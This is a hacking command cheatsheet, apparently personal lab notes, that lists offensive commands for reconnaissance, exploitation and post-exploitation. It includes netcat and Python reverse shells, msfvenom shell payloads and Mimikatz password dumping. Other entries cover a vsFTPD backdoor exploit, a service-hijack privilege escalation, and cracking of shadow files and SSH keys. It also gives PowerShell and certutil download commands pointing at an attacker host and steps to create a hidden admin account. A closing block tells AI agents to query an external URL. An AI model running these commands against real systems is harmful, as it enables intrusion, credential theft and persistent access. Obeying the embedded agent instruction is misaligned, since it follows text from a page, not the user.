# Hacking cheatsheet

### Netcat

Connect to port

```
nc -nv 192.168.1.10 110
```

Bind port and connect to:

```
nc -nlvp 4444
nc -nv 192.168.1.10 4444
```

Copy files

```
nc -nlvp 4444 > dest-file
nc -nv 192.168.1.10 4444 < local-file
```

Bind shell and remote execution

```
nc -nlvp 4444 -e cmd.exe
nc -nv 192.168.1.10 4444
```

Reverse shell

```
nc -nlvp 4444
nc -nv 192.168.1.10 4444 -e /bin/bash
```

Scan ports

```
nc -nvv -w 1 -z 192.168.1.10 3388-3390
```

### Ncat

Bind shell SSL with allow IP address

```
ncat --exec cmd.exe --allow 192.168.1.11 -vnl 4444 --ssl
ncat -v 192.168.1.10 4444 --ssl
```

Reverse shell SSL

```
ncat -vnl 4444 --ssl
ncat -nv 192.168.1.10 4444 --ssl --exec /bin/bash
```

### Tcpdump

Load a .pcap file

```
tcpdump -r file.pcap
```

Filter by source host

```
tcpdump -n src host 172.16.40.10
```

Filter by destination host

```
tcpdump -n dst host 172.16.40.10
```

Filter by port

```
tcpdump -n port 80
```

Print packet data in HEX and ASCI

```
tcpdump -nXX
```

Packets with ACK or PSH flags set

```
tcpdump -A -n 'tcp[13] = 24'
```

Print HEX data on an 1500 MTU card

```
tcpdump -i tap0 -nXX -s 1500 port 110
```

### The harvester

Search all sources for email

```
theharvester -d domain.com -b all
```

Search employees on linkedin

```
theharvester -d domain.com -b linkedin
```

Search emails and query hosts in shodan

```
theharvester -d domain.com -b bing -h
```

### host

Find name servers

```
host -t ns domain.com
```

Find mail servers

```
host -t mx domain.com
```

Find address and mail servers

```
host domain.com
```

Reverse lookup

```
host 1.2.3.4
```

Transfer DNS zone

```
host -l domain.com domain-nameserver.com
```

Try all NS DNS zone transfer

```
HOST=host.com; for ns in $(host -t ns $HOST | awk '{print $4}'); do host -l $HOST $ns | grep "has address" ; done
```

### dnsrecon

Try DNS zone transfer

```
dnsrecon -d domain.com -t axfr
```

### dnsenum

Enumerate host in a domain

```
dnsenum domain.com
```

### Nmap

TCP syn/ack scan

```
nmap -sT 10.11.11.123
```

Scan all ports

```
nmap -sS 1.1.1.1 -p-
```

Identify host in the network (ICMP)

```
nmap -sn -v 10.11.1.1-254 -oG host.txt
```

Scan port 80 on all hosts

```
nmap -p 80 10.11.1.1-254 -oG web-host.txt
```

OS, port, version, traceroute and script scan of top 20 port in a range

```
nmap -sT -A -top-ports=20 10.11.1.1-254 -oG top-ports.txt
```

OS scan

```
nmap -O 10.11.11.123
```

Service Version scan

```
nmap -sV -sT 10.11.11.123
```

Script discover nsb and host version

```
nmap 10.11.11.123 -p 139,445 --script smb-os-discovery.nse
```

Script DNS zone transfer

```
nmap --script dns-zone-transfer -p 53 ns2.domain.com
```

Scan for smb services (139-netbios,445-microsoft-ds)

```
nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
```

Enum http path

```
nmap -v -p 80 192.168.56.101 --script http-enum.ns
```

### SMB

Discover SMB hosts in a network, get IP, NetBIOS name and users

```
nbtscan -r 10.11.1.0/24
```

Discover SMB host info

```
enum4linux -a 10.11.1.227
```

Search specific vulnerability

```
nmap -v -p139,445 --script smb-vuln-ms08-067 --script-args=unsafe=1 10.13.10.4
```

Enumerate shares

```
nmap --script smb-enum-shares 10.13.10.4 -p139,445 -T4
```

Map smb shares

```
smbmap -H 10.14.15.16 -u guest
```

Mount share

```
mount -t cifs -o vers=1.0,username=guest,password="" //10.11.12.13/wwwroot /tmp/path
```

### SMTP

Connect smtp

```
nc -nv 192.168.56.101 25
# Check if user exists
VRFY root
```

### SNMP

* Port: 161
* Type: UDP

Scan strings \[community, public, manager, etc]

```
onesixtyone -c snmp_strings.txt 127.0.0.1
```

Enumerate MIB tree

```
snmpwalk -c public -v1 127.0.0.1
```

Enumerate some SMTP OID

```
snmpwalk -c <COMMUNITY_STRING> <version> <HOST> <OID>
```

### msfvenom

PHP reverse shell

```
msfvenom -p php/reverse_php LHOST=10.11.0.49 LPORT=443 -f raw > shell.php
```

Windows bind port (No firewall enabled)

```
msfvenom -p windows/shell_bind_tcp R LPORT=4446 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
```

Microsoft ASP .net reverse shell

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=4445 -f asp > shell.asp
```

Create windows executable

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=8080 -f exe -e x86/shikata_ga_nai -i 9 -o httpd.exe
```

### GCC / compilation

Regular compilation

```
gcc -o OpenFuck 47080.c -lcrypto
```

Cross compile x86 in x86\_64 host

```
gcc -Wall -o <out_file> <exploit.c> -m32 -march=i686 -Wl,--hash-style=both
gcc -m32 -Wl,--hash-style=both -o udev udev.c
```

### Nikto

Analise web with default settings

```
nikto -host http://10.11.1.10
```

### dirb

Scan web service directories and files

```
dirb http://192.168.1.10
```

Scan non recursively, non show attempts and bigger words list

```
dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt -r -S
```

### FTP

Non interactive FTP download from windows

```
echo open 10.11.0.49 21 > ftp.txt
echo USER xnaaro >> ftp.txt
echo 12345>> ftp.txt
echo bin >> ftp.txt
echo GET wget.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
```

### Mimikatz

Non interactive hash dump

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
```

### Webserver

Create a python webserver

```
python -m SimpleHTTPServer 80
```

## NoSQLmap

```
python nosqlmap.py --attack 2 --victim host.name --webPort 80 --uri / --httpMethod POST --postData username,test_user,password,test_password,login,login --injectedParameter 3 --injectSize 4 --injectFormat 2 --savePath output.log --verb ON
```

### NoSQl user/pass enum

```
# Git repository: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
python3 nosqli_enumeration.py -u http://localhost/index.php -up email -pp password -ep password -m POST
```

### Searchsploit

Search exploit

```
searchsploit <name>
```

See exploit code

```
searchsploit -x /path/exploit
```

Copy exploit current location

```
searchsploit -m path/exploit
```

### John the ripper

Merge passwd and shadow files

```
unshadow /etc/passwd /etc/shadow > unshadow.txt
```

Crack passwords

```
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadow_pass.txt
```

Crack SSH key passphrase

```
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 
```

Mutate cewl dictionary

```
john --wordlist=cewl_words.txt --rules --stdout > mutated_words
```

### hashcat

Crack linux passwords

```
hashcat -m 1800 -O passwd.hash /usr/share/wordlists/rockyou.txt --force
```

### File inclusion

LFI example

```
http://10.12.13.14/classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
```

### Shells

Python interactive bash shell

```
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm && export SHELL=bash
```

Scape restricted shell: `-rbash: /usr/bin/python: restricted: cannot specify '/' in command names`

```
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
```

Python reverse shell

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.49",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
```

### Mysql

Non interactive queries

```
mysql -u <user> -p<passwd> -D otrs -e "show databases;"
```

### Robots.txt

Crawl robots txt as a search engine agent

```
curl --user-agent Googlebot http://10.11.12.13/robots.txt -v
```

### Hydra

Generate passwds from web words

```
cewl http://10.11.12.13 -m 2 -w output
```

Brute force logging

```
hydra -L usernames.txt -P passwords.txt <IP>  <MODE> "<PATH>:Action=<HTTP_QUERY>&User=^USER^&Password=^PASS^:<ERROR message when fail"
# Example
hydra -L usernames -P output 10.11.12.13  http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:F=Login"
```

## Fuzzing

### ffuz

Silent fuzzing

```
ffuf -s -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.168:8080/FUZZ
```

### Whatweb

```
$ whatweb http://10.10.10.168:8080   
http://10.10.10.168:8080 [200 OK] Country[RESERVED][ZZ], Email[secure@obscure.htb], HTML5, HTTPServer[BadHTTPServer], IP[10.10.10.168], JQuery, Script, Title[0bscura], X-UA-Compatible[IE=Edge]

```

## Windows commands

Create admin user with RDP

```
net user xnaaro 12345 /add
net localgroup administrators xnaaro /add
net localgroup "Remote Desktop Users" xnaaro /add
```

Quick local enumeration

```
echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: &  type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
```

### Downloads

Download file with powershell

* Option 1

```
echo (New-Object System.Net.WebClient).DownloadFile("http://10.11.0.49/wget.exe", "wget.exe") > wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```

* Option 2

```
PowerShell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.49/wget.exe','wget.exe')
```

Non interactive download

```
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.49/wget.exe" >>wget.ps1
echo $file = "wget.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```

Download file with certutil

```
certutil -urlcache -split -f "http://10.11.0.49/wget.exe" wget.exe
```

### Windows exploit suggester

Copy systeminfo to local host

```
./windows-exploit-suggester.py --database 2019-11-29-mssb.xls --systeminfo /tmp/systeminfo
```

### Well know exploits

* Ubuntu 11 - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
* Windows compiled exploits repo <https://github.com/SecWiki/windows-kernel-exploits.git>

## Common vulnerabilities

### vsFTPD 2.3.4

Exploit and reverse shell

```
python3 vsftpd_234_exploit.py 192.168.56.101 21 "sh -c 'nc -nv 192.168.56.1 44444 -e /bin/bash > /dev/null 2>&1 &'"
```

### Windows XP SP1 priv escalation

```
sc config upnphost binpath= "C:\Inetpub\Scripts\nc.exe 10.11.0.49 10000 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.egonzalez.org/hacking/index/command-cheatsheet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.